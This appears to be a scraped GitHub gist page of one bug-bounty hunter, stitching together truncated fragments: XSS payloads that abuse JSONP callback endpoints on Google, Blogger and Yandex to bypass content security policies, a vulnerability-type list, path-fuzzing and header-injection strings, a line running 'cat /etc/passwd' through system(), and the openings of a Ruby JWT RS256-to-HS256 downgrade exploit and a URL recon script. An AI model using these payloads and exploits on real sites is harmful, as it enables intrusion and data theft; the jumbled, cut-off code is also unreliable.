Rafael Rodrigues Lopseg

💭
Available
View GitHub Profile
@Lopseg
Lopseg / poc.json
Last active April 10, 2020 13:09
poc.json
{
"metadata": {
"css": [
""
],
"name": ""
},
"nbformat": 3,
"nbformat_minor": 0,
"worksheets": [
#Google.com:
"><script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert#1"></script>
"><script src="https://googleads.g.doubleclick.net/pagead/conversion/1036918760/wcm?callback=alert(1337)"></script>
"><script src="https://www.googleadservices.com/pagead/conversion/1070110417/wcm?callback=alert(1337)"></script>
"><script src="https://cse.google.com/api/007627024705277327428/cse/r3vs7b0fcli/queries/js?callback=alert(1337)"></script>
"><script src="https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)"></script>
#Blogger.com:
"><script src="https://www.blogger.com/feeds/5578653387562324002/posts/summary/4427562025302749269?callback=alert(1337)"></script>
#Yandex:
"><script src="https://translate.yandex.net/api/v1.5/tr.json/detect?callback=alert(1337)"></script>
@Lopseg
Lopseg / vuln_list.txt
Created November 9, 2019 09:30
150 vulnerability types that you can submit for. Thanks to @thecybermentor and hackerone.
Account Hijacking
Allocation of Resources Without Limits or Throttling - CWE-770
Array Index Underflow - CWE-129
Authentication Bypass Using an Alternate Path or Channel - CWE-288
Brute Force - CWE-307
Buffer Over-read - CWE-126
Buffer Underflow - CWE-124
Buffer Under-read - CWE-127
Business Logic Errors - CWE-840
Classic Buffer Overflow - CWE-120
@Lopseg
Lopseg / filepaths.txt
Created September 19, 2019 16:22
Here are file paths that are always good to check, in case our targets have some of them.
op/oauth/sketchfab
op/oauth/dropbox
@Lopseg
Lopseg / jwt_downgrade.rb
Created September 1, 2019 20:18
JWT Ruby exploit that can be used to exploit JWT downgrade vulnerabilities (RS256 to HS256).
require 'base64'
require 'openssl'
pub = File.open("public.pem").read
TOKEN = "XXX"
header, payload, signature = TOKEN.split('.')
/secure/popups/UserPickerBrowser.jspa
WEB-INF/context/db-context-standalone.xml
!.gitignore
!.htaccess
!.htpasswd
%20../
%2e%2e//google.com
%3f/
%EXT%
%ff/
X-Forwarded-Host: wootwoot
X-Host: wootwoot.net
X-Forwarded-Server: wootwoot
X-Original-URL: /wootwoot
<pre>system('cat /etc/passwd')</pre>
@Lopseg
Lopseg / waybackurls.py
Last active August 3, 2019 10:07 — forked from mhmdiaa/waybackurls.py
Lopseg's forked version of waybackurls.py
#!/usr/bin/python2
import requests
import sys
import json
import os
all_urls = []
urls_wparams = []
def create_report(all_data,parameters):